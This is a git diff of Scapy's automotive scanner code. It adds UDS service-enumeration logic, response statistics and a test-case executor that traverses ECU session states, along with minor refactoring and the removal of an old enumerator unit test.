+ def execute(self, socket, state, **kwargs): + # type: (_SocketUnion, EcuState, Any) -> None + timeout = kwargs.pop('timeout', 1) + execution_time = kwargs.pop("execution_time", 1200) + + it = self.__get_request_iterator(state, **kwargs) + + # log_interactive.debug("[i] Using iterator %s in state %s", it, state) + + start_time = time.time() + log_interactive.debug( + "[i] Start execution of enumerator: %s", time.ctime(start_time)) + + for req in it: + try: + res = socket.sr1(req, timeout=timeout, verbose=False) + except (OSError, ValueError, Scapy_Exception) as e: + if self._retry_pkt is None: + log_interactive.debug( + "[-] Exception '%s' in execute. Prepare for retry", e) + self._retry_pkt = req + else: + log_interactive.critical( + "[-] Exception during retry. This is bad") + raise e + + if socket.closed: + log_interactive.critical("[-] Socket closed during scan.") + return + + self._store_result(state, req, res) + + if self._evaluate_response(state, req, res, **kwargs): + log_interactive.debug("[i] Stop test_case execution because " + "of response evaluation") + return + + if (start_time + execution_time) < time.time(): + log_interactive.debug( + "[i] Finished execution time of enumerator: %s", + time.ctime()) + return + + log_interactive.info("[i] Finished iterator execution") + self._state_completed[state] = True + log_interactive.debug("[i] States completed %s", + repr(self._state_completed)) + + def _evaluate_response(self, + state, # type: EcuState + request, # type: Packet + response, # type: Optional[Packet] + **kwargs # type: Optional[Dict[str, Any]] + ): # type: (...) -> bool # noqa: E501 + + if response is None: + # Nothing to evaluate, return and continue execute + return cast(bool, kwargs.pop("exit_if_no_answer_received", False)) + + exit_if_service_not_supported = \ + kwargs.pop("exit_if_service_not_supported", False) + retry_if_busy_returncode = \ + kwargs.pop("retry_if_busy_returncode", True) + exit_scan_on_first_negative_response = \ + kwargs.pop("exit_scan_on_first_negative_response", False) + + if exit_scan_on_first_negative_response and response.service == 0x7f: + return True + + if exit_if_service_not_supported and response.service == 0x7f: + response_code = self._get_negative_response_code(response) + if response_code in [0x11, 0x7f]: + names = {0x11: "serviceNotSupported", + 0x7f: "serviceNotSupportedInActiveSession"} + msg = "[-] Exit execute because negative response " \ + "%s received!" % names[response_code] + log_interactive.debug(msg) + # execute of current state is completed, + # since a serviceNotSupported negative response was received + self._state_completed[state] = True + # stop current execute and exit + return True + + if retry_if_busy_returncode and response.service == 0x7f \ + and self._get_negative_response_code(response) == 0x21: + + if self._retry_pkt is None: + # This was no retry since the retry_pkt is None + self._retry_pkt = request + log_interactive.debug( + "[-] Exit execute. Retry packet next time!") + return True + else: + # This was a unsuccessful retry, continue execute + self._retry_pkt = None + log_interactive.debug("[-] Unsuccessful retry!") + return False + else: + self._retry_pkt = None + + if EcuState.is_modifier_pkt(response): + if state != EcuState.get_modified_ecu_state( + response, request, state): + log_interactive.debug( + "[-] Exit execute. Ecu state was modified!") + return True + + return False + + def _compute_statistics(self): + # type: () -> List[Tuple[str, str, str]] + data_sets = [("all", self._results)] + + for state in self._state_completed.keys(): + data_sets.append((repr(state), + [r for r in self._results if r.state == state])) + + stats = list() # type: List[Tuple[str, str, str]] + + for desc, data in data_sets: + answered = [r for r in data if r.resp is not None] + unanswered = [r for r in data if r.resp is None] + answertimes = [float(x.resp_ts) - float(x.req_ts) for x in answered if # noqa: E501 + x.resp_ts is not None and x.req_ts is not None] + answertimes_nr = [float(x.resp_ts) - float(x.req_ts) for x in answered if x.resp # noqa: E501 + is not None and x.resp_ts is not None and + x.req_ts is not None and x.resp.service == 0x7f] + answertimes_pr = [float(x.resp_ts) - float(x.req_ts) for x in answered if x.resp # noqa: E501 + is not None and x.resp_ts is not None and + x.req_ts is not None and x.resp.service != 0x7f] + + nrs = [r.resp for r in data if r.resp is not None and + r.resp.service == 0x7f] + stats.append((desc, "num_answered", str(len(answered)))) + stats.append((desc, "num_unanswered", str(len(unanswered)))) + stats.append((desc, "num_negative_resps", str(len(nrs)))) + + for postfix, times in zip( + ["", "_nr", "_pr"], + [answertimes, answertimes_nr, answertimes_pr]): + try: + ma = str(round(max(times), 5)) + except ValueError: + ma = "-" + + try: + mi = str(round(min(times), 5)) + except ValueError: + mi = "-" + + try: + avg = str(round(sum(times) / len(times), 5)) + except (ValueError, ZeroDivisionError): + avg = "-" + + stats.append((desc, "answertime_min" + postfix, mi)) + stats.append((desc, "answertime_max" + postfix, ma)) + stats.append((desc, "answertime_avg" + postfix, avg)) + + return stats + + def _show_statistics(self, dump=False): + # type: (bool) -> Union[str, None] + stats = self._compute_statistics() + + s = "%d requests were sent, %d answered, %d unanswered" % \ + (len(self._results), + len(self.results_with_response), + len(self.results_without_response)) + "\n" + + s += "Statistics per state\n" + s += make_lined_table(stats, lambda x: x, dump=True, sortx=str, + sorty=str) or "" + + if dump: + return s + "\n" + else: + print(s) + return None + + def _prepare_negative_response_blacklist(self): + # type: () -> None + nrc_dict = defaultdict(int) # type: Dict[int, int] + for nr in self.results_with_negative_response: + nrc_dict[self._get_negative_response_code(nr.resp)] += 1 + + total_nr_count = len(self.results_with_negative_response) + for nrc, nr_count in nrc_dict.items(): + if nrc not in self.negative_response_blacklist and \ + nr_count > 30 and (nr_count / total_nr_count) > 0.3: + log_interactive.info("Added NRC 0x%02x to filter", nrc) + self.negative_response_blacklist.append(nrc) + + if nrc in self.negative_response_blacklist and nr_count < 10: + log_interactive.info("Removed NRC 0x%02x to filter", nrc) + self.negative_response_blacklist.remove(nrc) + + @property + def results(self): + # type: () -> List[_AutomotiveTestCaseScanResult] + return self._results + + @property + def results_with_response(self): + # type: () -> List[_AutomotiveTestCaseFilteredScanResult] + filtered_results = list() + for r in self._results: + if r.resp is None: + continue + if r.resp_ts is None: + continue + fr = cast(_AutomotiveTestCaseFilteredScanResult, r) + filtered_results.append(fr) + return filtered_results + + @property + def filtered_results(self): + # type: () -> List[_AutomotiveTestCaseFilteredScanResult] + filtered_results = list() + + for r in self.results_with_response: + if r.resp.service != 0x7f: + filtered_results.append(r) + continue + nrc = self._get_negative_response_code(r.resp) + if nrc not in self.negative_response_blacklist: + filtered_results.append(r) + return filtered_results + + @property + def scanned_states(self): + # type: () -> Set[EcuState] + """ + Helper function to get all sacnned states in results + :return: all scanned states + """ + return set([tup.state for tup in self._results]) + + @property + def results_with_negative_response(self): + # type: () -> List[_AutomotiveTestCaseFilteredScanResult] + """ + Helper function to get all results with negative response + :return: all results with negative response + """ + return [cast(_AutomotiveTestCaseFilteredScanResult, r) for r in self._results # noqa: E501 + if r.resp and r.resp.service == 0x7f] + + @property + def results_with_positive_response(self): + # type: () -> List[_AutomotiveTestCaseFilteredScanResult] + """ + Helper function to get all results with positive response + :return: all results with positive response + """ + return [cast(_AutomotiveTestCaseFilteredScanResult, r) for r in self._results # noqa: E501 + if r.resp and r.resp.service != 0x7f] + + @property + def results_without_response(self): + # type: () -> List[_AutomotiveTestCaseScanResult] + """ + Helper function to get all results without response + :return: all results without response + """ + return [r for r in self._results if r.resp is None] + + def _show_negative_response_details(self, dump=False): + # type: (bool) -> Optional[str] + nrc_dict = defaultdict(int) # type: Dict[int, int] + for nr in self.results_with_negative_response: + nrc_dict[self._get_negative_response_code(nr.resp)] += 1 + + s = "These negative response codes were received " + \ + " ".join([hex(c) for c in nrc_dict.keys()]) + "\n" + for nrc, nr_count in nrc_dict.items(): + s += "\tNRC 0x%02x: %s received %d times" % ( + nrc, self._get_negative_response_desc(nrc), nr_count) + s += "\n" + + if dump: + return s + "\n" + else: + print(s) + return None + + def _show_negative_response_information(self, dump, filtered=True): + # type: (bool, bool) -> Optional[str] + s = "%d negative responses were received\n" % \ + len(self.results_with_negative_response) + + if not dump: + print(s) + s = "" + else: + s += "\n" + + s += self._show_negative_response_details(dump) or "" + "\n" + if filtered and len(self.negative_response_blacklist): + s += "The following negative response codes are blacklisted: %s\n"\ + % [self._get_negative_response_desc(nr) + for nr in self.negative_response_blacklist] + + if dump: + return s + "\n" + else: + print(s) + return None + + def _show_results_information(self, dump, filtered): + # type: (bool, bool) -> Optional[str] + def _get_table_entry( + tup # type: _AutomotiveTestCaseScanResult + ): # type: (...) -> Tuple[str, str, str] + return self._get_table_entry_x(tup), \ + self._get_table_entry_y(tup), \ + self._get_table_entry_z(tup) + s = "=== No data to display ===\n" + data = self._results if not filtered else self.filtered_results # type: Union[List[_AutomotiveTestCaseScanResult], List[_AutomotiveTestCaseFilteredScanResult]] # noqa: E501 + if len(data): + s = make_lined_table( + data, _get_table_entry, dump=dump, sortx=str) or "" + + if dump: + return s + "\n" + else: + print(s) + return None + + def show(self, dump=False, filtered=True, verbose=False): + # type: (bool, bool, bool) -> Optional[str] + if filtered: + self._prepare_negative_response_blacklist() + + s = self._show_header(dump) or "" + s += self._show_statistics(dump) or "" + s += self._show_negative_response_information(dump, filtered) or "" + s += self._show_results_information(dump, filtered) or "" + + if verbose: + s += self._show_state_information(dump) or "" + + if dump: + return s + "\n" + else: + print(s) + return None + + def _get_label(self, response, positive_case="PR: PositiveResponse"): + # type: (Optional[Packet], Union[Callable[[Packet], str], str]) -> str + if response is None: + return "Timeout" + elif orb(bytes(response)[0]) == 0x7f: + return self._get_negative_response_label(response) + else: + if isinstance(positive_case, six.string_types): + return cast(str, positive_case) + elif callable(positive_case): + return positive_case(response) + else: + raise Scapy_Exception("Unsupported Type for positive_case. " + "Provide a string or a function.") + + @property + def supported_responses(self): + # type: () -> List[EcuResponse] + + supported_resps = list() + all_responses = [p for p in self.__result_packets.values() + if orb(bytes(p)[0]) & 0x40] + for resp in all_responses: + states = list(set([t.state for t in self.results_with_response + if t.resp == resp])) + supported_resps.append(EcuResponse(state=states, responses=resp)) + return supported_resps + + +@six.add_metaclass(abc.ABCMeta) +class StateGeneratingServiceEnumerator(ServiceEnumerator, StateGenerator): + def __init__(self): + # type: () -> None + super(StateGeneratingServiceEnumerator, self).__init__() + + # Internal storage of request packets for a certain Edge. If an edge + # is found during the evaluation of the last result of the + # ServiceEnumerator, the according request of the result tuple is + # stored together with the new Edge. + self._edge_requests = dict() # type: Dict[_Edge, Packet] + + def get_new_edge(self, + socket, # type: _SocketUnion + config # type: AutomotiveTestCaseExecutorConfiguration + ): + # type: (...) -> Optional[_Edge] + """ + Basic identification of a new edge. The last response is evaluated. + If this response packet can modify the state of an Ecu, this new + state is returned, otherwise None. + + :param socket: Socket to the DUT (unused) + :param config: Global configuration of the executor (unused) + :return: tuple of old EcuState and new EcuState, or None + """ + try: + state, req, resp, _, _ = cast(ServiceEnumerator, self).results[-1] + except IndexError: + return None + + if resp is not None and EcuState.is_modifier_pkt(resp): + new_state = EcuState.get_modified_ecu_state(resp, req, state) + if new_state == state: + return None + else: + edge = (state, new_state) + self._edge_requests[edge] = req + return edge + else: + return None + + @staticmethod + def transition_function( + sock, # type: _SocketUnion + config, # type: AutomotiveTestCaseExecutorConfiguration + kwargs # type: Dict[str, Any] + ): + # type: (...) -> bool + """ + Very basic transition function. This function sends a given request + in kwargs and evaluates the response. + + :param sock: Connection to the DUT + :param config: Global configuration of the executor (unused) + :param kwargs: Dictionary with arguments. This function only uses + the argument *"req"* which must contain a Packet, + causing an EcuState transition of the DUT. + :return: True in case of a successful transition, else False + """ + req = kwargs.get("req", None) + if req is None: + return False + + try: + res = sock.sr1(req, timeout=20, verbose=False) + return res is not None and res.service != 0x7f + except (OSError, ValueError, Scapy_Exception) as e: + log_interactive.critical( + "[-] Exception in transition function: %s", e) + return False + + def get_transition_function_description(self, edge): + # type: (_Edge) -> str + return repr(self._edge_requests[edge]) + + def get_transition_function_kwargs(self, edge): + # type: (_Edge) -> Dict[str, Any] + req = self._edge_requests[edge] + kwargs = { + "desc": self.get_transition_function_description(edge), + "req": req + } + return kwargs + + def get_transition_function(self, socket, edge): + # type: (_SocketUnion, _Edge) -> Optional[_TransitionTuple] + try: + return self.transition_function, \ + self.get_transition_function_kwargs(edge), None + except KeyError: + return None diff --git a/scapy/contrib/automotive/scanner/executor.py b/scapy/contrib/automotive/scanner/executor.py new file mode 100644 index 00000000000..b6dda8f6e45 --- /dev/null +++ b/scapy/contrib/automotive/scanner/executor.py @@ -0,0 +1,338 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Nils Weiss +# This program is published under a GPLv2 license + +# scapy.contrib.description = AutomotiveTestCaseExecutor base class +# scapy.contrib.status = library + +import abc +import time + +from itertools import product + +from scapy.compat import Any, Union, List, Optional, \ + Dict, Callable, Type +from scapy.contrib.automotive.scanner.graph import Graph +from scapy.error import Scapy_Exception, log_interactive +from scapy.utils import make_lined_table, SingleConversationSocket +import scapy.modules.six as six +from scapy.contrib.automotive.ecu import EcuState, EcuResponse, Ecu +from scapy.contrib.automotive.scanner.configuration import \ + AutomotiveTestCaseExecutorConfiguration +from scapy.contrib.automotive.scanner.test_case import AutomotiveTestCaseABC, \ + _SocketUnion, _CleanupCallable, StateGenerator, TestCaseGenerator + + +@six.add_metaclass(abc.ABCMeta) +class AutomotiveTestCaseExecutor: + """ + Base class for different automotive scanners. This class handles + the connection to a scan target, ensures the execution of all it's + test cases, and stores the system state machine + """ + @property + def __initial_ecu_state(self): + # type: () -> EcuState + return EcuState(session=1) + + def __init__( + self, + socket, # type: _SocketUnion + reset_handler=None, # type: Optional[Callable[[], None]] + reconnect_handler=None, # type: Optional[Callable[[], _SocketUnion]] # noqa: E501 + test_cases=None, # type: Optional[List[Union[AutomotiveTestCaseABC, Type[AutomotiveTestCaseABC]]]] # noqa: E501 + **kwargs # type: Optional[Dict[str, Any]] + ): # type: (...) -> None + # The TesterPresentSender can interfere with a test_case, since a + # target may only allow one request at a time. + # The SingleConversationSocket prevents interleaving requests. + if not isinstance(socket, SingleConversationSocket): + self.socket = SingleConversationSocket(socket) + else: + self.socket = socket + + self.target_state = self.__initial_ecu_state + self.reset_handler = reset_handler + self.reconnect_handler = reconnect_handler + + self.cleanup_functions = list() # type: List[_CleanupCallable] + + self.configuration = AutomotiveTestCaseExecutorConfiguration( + test_cases or self.default_test_case_clss, **kwargs) + + self.configuration.state_graph.add_edge( + (self.__initial_ecu_state, self.__initial_ecu_state)) + + def __reduce__(self): # type: ignore + f, t, d = super(AutomotiveTestCaseExecutor, self).__reduce__() # type: ignore # noqa: E501 + try: + del d["socket"] + except KeyError: + pass + try: + del d["reset_handler"] + except KeyError: + pass + try: + del d["reconnect_handler"] + except KeyError: + pass + return f, t, d + + @property + @abc.abstractmethod + def default_test_case_clss(self): + # type: () -> List[Type[AutomotiveTestCaseABC]] + raise NotImplementedError() + + @property + def state_graph(self): + # type: () -> Graph + return self.configuration.state_graph + + @property + def state_paths(self): + # type: () -> List[List[EcuState]] + """ + Returns all state paths. A path is represented by a list of EcuState + objects. + :return: A list of paths. + """ + paths = [Graph.dijkstra(self.state_graph, self.__initial_ecu_state, s) + for s in self.state_graph.nodes + if s != self.__initial_ecu_state] + return sorted( + [p for p in paths if p is not None] + [[self.__initial_ecu_state]], + key=lambda x: x[-1]) + + @property + def final_states(self): + # type: () -> List[EcuState] + """ + Returns a list with all final states. A final state is the last + state of a path. + :return: + """ + return [p[-1] for p in self.state_paths] + + @property + def scan_completed(self): + # type: () -> bool + return all(t.has_completed(s) for t, s in + product(self.configuration.test_cases, self.final_states)) + + def reset_target(self): + # type: () -> None + log_interactive.info("[i] Target reset") + if self.reset_handler: + self.reset_handler() + self.target_state = self.__initial_ecu_state + + def reconnect(self): + # type: () -> None + if self.reconnect_handler: + try: + self.socket.close() + except Exception as e: + log_interactive.debug( + "[i] Exception '%s' during socket.close", e) + + log_interactive.info("[i] Target reconnect") + socket = self.reconnect_handler() + if not isinstance(socket, SingleConversationSocket): + self.socket = SingleConversationSocket(socket) + else: + self.socket = socket + + def execute_test_case(self, test_case): + # type: (AutomotiveTestCaseABC) -> None + """ + This function ensures the correct execution of a testcase, including + the pre_execute, execute and post_execute. + Finally the testcase is asked if a new edge or a new testcase was + generated. + :param test_case: A test case to be executed + :return: None + """ + test_case.pre_execute( + self.socket, self.target_state, self.configuration) + + try: + test_case_kwargs = self.configuration[test_case.__class__.__name__] + except KeyError: + test_case_kwargs = dict() + + log_interactive.debug("[i] Execute test_case %s with args %s", + test_case.__class__.__name__, test_case_kwargs) + + test_case.execute(self.socket, self.target_state, **test_case_kwargs) + test_case.post_execute( + self.socket, self.target_state, self.configuration) + + if isinstance(test_case, StateGenerator): + edge = test_case.get_new_edge(self.socket, self.configuration) + if edge: + log_interactive.debug("Edge found %s", edge) + tf = test_case.get_transition_function(self.socket, edge) + self.state_graph.add_edge(edge, tf) + + if isinstance(test_case, TestCaseGenerator): + new_test_case = test_case.get_generated_test_case() + if new_test_case: + log_interactive.debug("Testcase generated %s", new_test_case) + self.configuration.add_test_case(new_test_case) + + def scan(self, timeout=None): + # type: (Optional[int]) -> None + """ + Executes all testcases for a given time. + :param timeout: Time for execution. + :return: None + """ + kill_time = time.time() + (timeout or 0xffffffff) + while kill_time > time.time(): + test_case_executed = False + log_interactive.debug("[i] Scan paths %s", self.state_paths) + for p, test_case in product( + self.state_paths, self.configuration.test_cases): + log_interactive.info("[i] Scan path %s", p) + terminate = kill_time < time.time() + if terminate: + log_interactive.debug( + "[-] Execution time exceeded. Terminating scan!") + break + + final_state = p[-1] + if test_case.has_completed(final_state): + log_interactive.debug("[+] State %s for %s completed", + repr(final_state), test_case) + continue + + try: + if not self.enter_state_path(p): + log_interactive.error( + "[-] Error entering path %s", p) + continue + log_interactive.info( + "[i] Execute %s for path %s", str(test_case), p) + self.execute_test_case(test_case) + test_case_executed = True + except (OSError, ValueError, Scapy_Exception) as e: + log_interactive.critical("[-] Exception: %s", e) + if self.configuration.debug: + raise e + finally: + self.cleanup_state() + + if not test_case_executed: + log_interactive.info( + "[i] Execute failure or scan completed. Exit scan!") + break + + self.cleanup_state() + self.reset_target() + + def enter_state_path(self, path): + # type: (List[EcuState]) -> bool + """ + Resets and reconnects to a target and applies all transition functions + to traversal a given path. + :param path: Path to be applied to the scan target. + :return: True, if all transition functions could be executed. + """ + if path[0] != self.__initial_ecu_state: + raise Scapy_Exception( + "Initial state of path not equal reset state of the target") + if len(path) == 1: + return True + + self.reset_target() + self.reconnect() + + for next_state in path[1:]: + edge = (self.target_state, next_state) + if not self.enter_state(*edge): + self.state_graph.downrate_edge(edge) + self.cleanup_state() + return False + return True + + def enter_state(self, prev_state, next_state): + # type: (EcuState, EcuState) -> bool + """ + Obtains a transition function from the system state graph and executes + it. On success, the cleanup function is added for a later cleanup of + the new state. + :param prev_state: Current state + :param next_state: Desired state + :return: True, if state could be changed successful + """ + edge = (prev_state, next_state) + funcs = self.state_graph.get_transition_tuple_for_edge(edge) + + if funcs is None: + log_interactive.error("[!] No transition function for %s", edge) + return False + + trans_func, trans_kwargs, clean_func = funcs + state_changed = trans_func( + self.socket, self.configuration, trans_kwargs) + if state_changed: + self.target_state = next_state + + if clean_func is not None: + self.cleanup_functions += [clean_func] + return True + else: + log_interactive.info("[-] Transition for edge %s failed", edge) + return False + + def cleanup_state(self): + # type: () -> None + """ + Executes all collected cleanup functions from a traversed path + :return: None + """ + for f in self.cleanup_functions: + if not callable(f): + continue + try: + if not f(self.socket, self.configuration): + log_interactive.info( + "[-] Cleanup function %s failed", repr(f)) + except (OSError, ValueError, Scapy_Exception) as e: + log_interactive.critical("[!] Exception during cleanup: %s", e) + + self.cleanup_functions = list() + + def show_testcases(self): + # type: () -> None + for t in self.configuration.test_cases: + t.show() + + def show_testcases_status(self): + # type: () -> None + data = list() + for t in self.configuration.test_cases: + for s in self.state_graph.nodes: + data += [(repr(s), t.__class__.__name__, t.has_completed(s))] + make_lined_table(data, lambda tup: (tup[0], tup[1], tup[2])) + + @property + def supported_responses(self): + # type: () -> List[EcuResponse] + """ + Returns a sorted list of supported responses, gathered from all + enumerators. The sort is done in a way + to provide the best possible results, if this list of supported + responses is used to simulate an real world Ecu with the + EcuAnsweringMachine object. + :return: A sorted list of EcuResponse objects + """ + supported_responses = list() + for tc in self.configuration.test_cases: + supported_responses += tc.supported_responses + + supported_responses.sort(key=Ecu.sort_key_func) + return supported_responses diff --git a/scapy/contrib/automotive/scanner/staged_test_case.py b/scapy/contrib/automotive/scanner/staged_test_case.py index 6c0997733d0..6733285e3c1 100644 --- a/scapy/contrib/automotive/scanner/staged_test_case.py +++ b/scapy/contrib/automotive/scanner/staged_test_case.py @@ -23,7 +23,8 @@ # type definitions -_TestCaseConnectorCallable = Callable[[AutomotiveTestCaseABC, AutomotiveTestCaseABC], Dict[str, Any]] # noqa: E501 +_TestCaseConnectorCallable = \ + Callable[[AutomotiveTestCaseABC, AutomotiveTestCaseABC], Dict[str, Any]] class StagedAutomotiveTestCase(AutomotiveTestCaseABC, TestCaseGenerator, StateGenerator): # noqa: E501 @@ -62,8 +63,10 @@ class StagedAutomotiveTestCase(AutomotiveTestCaseABC, TestCaseGenerator, StateGe # TestCase. __delay_stages = 5 - def __init__(self, test_cases, connectors=None): - # type: (List[AutomotiveTestCaseABC], Optional[List[Optional[_TestCaseConnectorCallable]]]) -> None # noqa: E501 + def __init__(self, + test_cases, # type: List[AutomotiveTestCaseABC] + connectors=None # type: Optional[List[Optional[_TestCaseConnectorCallable]]] # noqa: E501 + ): # type: (...) -> None super(StagedAutomotiveTestCase, self).__init__() self.__test_cases = test_cases self.__connectors = connectors @@ -79,6 +82,15 @@ def __len__(self): # type: () -> int return len(self.__test_cases) + # TODO: Fix unit tests and remove this function + def __reduce__(self): # type: ignore + f, t, d = super(StagedAutomotiveTestCase, self).__reduce__() # type: ignore # noqa: E501 + try: + del d["_StagedAutomotiveTestCase__connectors"] + except KeyError: + pass + return f, t, d + @property def test_cases(self): # type: () -> List[AutomotiveTestCaseABC] @@ -111,8 +123,10 @@ def get_generated_test_case(self): except AttributeError: return None - def get_new_edge(self, socket, config): - # type: (_SocketUnion, AutomotiveTestCaseExecutorConfiguration) -> Optional[_Edge] # noqa: E501 + def get_new_edge(self, + socket, # type: _SocketUnion + config # type: AutomotiveTestCaseExecutorConfiguration + ): # type: (...) -> Optional[_Edge] try: test_case = cast(StateGenerator, self.current_test_case) return test_case.get_new_edge(socket, config) @@ -159,8 +173,11 @@ def has_completed(self, state): self.__completion_delay = 0 return False - def pre_execute(self, socket, state, global_configuration): - # type: (_SocketUnion, EcuState, AutomotiveTestCaseExecutorConfiguration) -> None # noqa: E501 + def pre_execute(self, + socket, # type: _SocketUnion + state, # type: EcuState + global_configuration # type: AutomotiveTestCaseExecutorConfiguration # noqa: E501 + ): # type: (...) -> None test_case_cls = self.current_test_case.__class__ try: self.__current_kwargs = global_configuration[ @@ -185,13 +202,17 @@ def pre_execute(self, socket, state, global_configuration): self.current_test_case.pre_execute(socket, state, global_configuration) def execute(self, socket, state, **kwargs): - # type: (_SocketUnion, EcuState, Any) -> None # noqa: E501 + # type: (_SocketUnion, EcuState, Any) -> None kwargs = self.__current_kwargs or dict() self.current_test_case.execute(socket, state, **kwargs) - def post_execute(self, socket, state, global_configuration): - # type: (_SocketUnion, EcuState, AutomotiveTestCaseExecutorConfiguration) -> None # noqa: E501 - self.current_test_case.post_execute(socket, state, global_configuration) # noqa: E501 + def post_execute(self, + socket, # type: _SocketUnion + state, # type: EcuState + global_configuration # type: AutomotiveTestCaseExecutorConfiguration # noqa: E501 + ): # type: (...) -> None + self.current_test_case.post_execute( + socket, state, global_configuration) @staticmethod def _show_headline(headline, sep="=", dump=False): diff --git a/scapy/contrib/automotive/scanner/test_case.py b/scapy/contrib/automotive/scanner/test_case.py index 8e4943d11af..522941753f4 100644 --- a/scapy/contrib/automotive/scanner/test_case.py +++ b/scapy/contrib/automotive/scanner/test_case.py @@ -31,7 +31,7 @@ @six.add_metaclass(abc.ABCMeta) -class AutomotiveTestCaseABC(): +class AutomotiveTestCaseABC: """ Base class for "TestCase" objects. In automotive scanners, these TestCase objects are used for individual tasks, for example enumerating over one @@ -52,8 +52,11 @@ def has_completed(self, state): raise NotImplementedError() @abc.abstractmethod - def pre_execute(self, socket, state, global_configuration): - # type: (_SocketUnion, EcuState, AutomotiveTestCaseExecutorConfiguration) -> None # noqa: E501 + def pre_execute(self, + socket, # type: _SocketUnion + state, # type: EcuState + global_configuration # type: AutomotiveTestCaseExecutorConfiguration # noqa: E501 + ): # type: (...) -> None """ Will be executed previously to ``execute``. This function can be used to manipulate the configuration passed to execute. @@ -78,8 +81,11 @@ def execute(self, socket, state, **kwargs): raise NotImplementedError() @abc.abstractmethod - def post_execute(self, socket, state, global_configuration): - # type: (_SocketUnion, EcuState, AutomotiveTestCaseExecutorConfiguration) -> None # noqa: E501 + def post_execute(self, + socket, # type: _SocketUnion + state, # type: EcuState + global_configuration # type: AutomotiveTestCaseExecutorConfiguration # noqa: E501 + ): # type: (...) -> None """ Will be executed subsequently to ``execute``. This function can be used for additional evaluations after the ``execute``. @@ -202,7 +208,7 @@ def show(self, dump=False, filtered=True, verbose=False): @six.add_metaclass(abc.ABCMeta) -class TestCaseGenerator(): +class TestCaseGenerator: @abc.abstractmethod def get_generated_test_case(self): # type: () -> Optional[AutomotiveTestCaseABC] @@ -210,7 +216,7 @@ def get_generated_test_case(self): @six.add_metaclass(abc.ABCMeta) -class StateGenerator(): +class StateGenerator: @abc.abstractmethod def get_new_edge(self, socket, config): @@ -225,7 +231,9 @@ def get_transition_function(self, socket, edge): :param socket: Socket to target :param edge: Tuple of EcuState objects for the requested transition function - :return: Returns an optional tuple with two functions. Both functions + :return: Returns an optional tuple consisting of a transition function, + a keyword arguments dictionary for the transition function + and a cleanup function. Both functions take a Socket and the TestCaseExecutor configuration as arguments and return True if the execution was successful. The first function is the state enter function, the second diff --git a/scapy/contrib/automotive/uds.py b/scapy/contrib/automotive/uds.py index d206f448f52..1adee033b27 100644 --- a/scapy/contrib/automotive/uds.py +++ b/scapy/contrib/automotive/uds.py @@ -1210,10 +1210,12 @@ def __init__(self, sock, pkt=UDS() / UDS_TP(), interval=2): def run(self): # type: () -> None - while not self._stopped.is_set(): + while not self._stopped.is_set() and not self._socket.closed: for p in self._pkts: self._socket.sr1(p, timeout=0.3, verbose=False) time.sleep(self._interval) + if self._stopped.is_set() or self._socket.closed: + break def UDS_SessionEnumerator(sock, session_range=range(0x100), reset_wait=1.5): diff --git a/scapy/contrib/cansocket_native.py b/scapy/contrib/cansocket_native.py index 6f8cc25494e..9c1068a55a5 100644 --- a/scapy/contrib/cansocket_native.py +++ b/scapy/contrib/cansocket_native.py @@ -20,7 +20,7 @@ from scapy.packet import Packet from scapy.layers.can import CAN, CAN_MTU from scapy.arch.linux import get_last_packet_timestamp -from scapy.compat import List, Dict, Type, Any, Optional, Tuple, raw +from scapy.compat import List, Dict, Type, Any, Optional, Tuple, raw, cast conf.contribs['NativeCANSocket'] = {'channel': "can0"} @@ -49,8 +49,8 @@ def __init__(self, **kwargs # type: Dict[str, Any] ): # type: (...) -> None - bustype = kwargs.pop("bustype", "") - if bustype != "socketcan": + bustype = cast(Optional[str], kwargs.pop("bustype", None)) + if bustype and bustype != "socketcan": warning("You created a NativeCANSocket. " "If you're providing the argument 'bustype', please use " "the correct one to achieve compatibility with python-can" diff --git a/scapy/utils.py b/scapy/utils.py index ddd88eb4797..0f2cdfa71cd 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -2573,16 +2573,17 @@ def __init__(self, sock, pkt, interval=0.5): def run(self): # type: () -> None - while not self._stopped.is_set(): + while not self._stopped.is_set() and not self._socket.closed: for p in self._pkts: self._socket.send(p) time.sleep(self._interval) - if self._stopped.is_set(): + if self._stopped.is_set() or self._socket.closed: break def stop(self): # type: () -> None self._stopped.set() + self.join(self._interval * 2) class SingleConversationSocket(object): @@ -2612,4 +2613,8 @@ def sr(self, *args, **kargs): def send(self, x): # type: (Packet) -> Any with self._tx_mutex: - return self._inner.send(x) + try: + return self._inner.send(x) + except (ConnectionError, OSError) as e: + self._inner.close() + raise e diff --git a/test/contrib/automotive/enumerator.uts b/test/contrib/automotive/enumerator.uts deleted file mode 100644 index 39df77a1541..00000000000 --- a/test/contrib/automotive/enumerator.uts +++ /dev/null @@ -1,103 +0,0 @@ -% Regression tests for enumerators - -+ Load general modules - -= Load contribution layer - -from scapy.contrib.automotive.enumerator import * -from scapy.contrib.automotive.uds import * - - -+ Basic checks -= Enumerator basecls checks - -pkts = [ - Enumerator.ScanResult("s1", UDS(b"\x20abcd"), UDS(b"\x60abcd")), - Enumerator.ScanResult("s2", UDS(b"\x20abcd"), None), - Enumerator.ScanResult("s1", UDS(b"\x21abcd"), UDS(b"\x7fabcd")), - Enumerator.ScanResult("s2", UDS(b"\x21abcd"), UDS(b"\x61abcd")), -] - -pkts[0].req.sent_time = 1.0 -pkts[1].req.sent_time = 2.0 -pkts[2].req.sent_time = 3.0 -pkts[3].req.sent_time = 4.0 - - -pkts[0].resp.time = 1.9 -pkts[2].resp.time = 3.1 -pkts[3].resp.time = 4.5 - - -e = Enumerator(None) -e.results = pkts - - -= Enumerator not completed check - -assert e.completed == False - - -= Enumerator stats check - -e.update_stats() -assert e.stats["answered"] == 3 -assert e.stats["unanswered"] == 1 -assert round(e.stats["answertime_max"], 1) == 0.9 -assert round(e.stats["answertime_min"], 1) == 0.1 -assert round(e.stats["answertime_avg"], 1) == 0.5 -assert e.stats["negative_resps"] == 1 - - -= Enumerator filtered results - -assert len(e.filtered_results) == 3 -assert e.filtered_results[0] == pkts[0] -assert e.filtered_results[1] == pkts[2] - - -= Enumerator scanned states - -assert len(e.scanned_states) == 2 -assert {"s1", "s2"} == e.scanned_states - -= Enumerator show - -def show_negative_response_details(self, dump=False): - pass - - -def get_table_entry(tup): - state, req, res = tup - label = Enumerator.get_label(res) - return state, "0x%02x: %s" % (req.service, req.sprintf("%UDS.service%")), label - -e.show_negative_response_details = show_negative_response_details -e.get_table_entry = get_table_entry - -e.show(filtered=False) - -dump = e.show(dump=True, filtered=False) -assert "NegativeResponse" in dump -assert "PositiveResponse" in 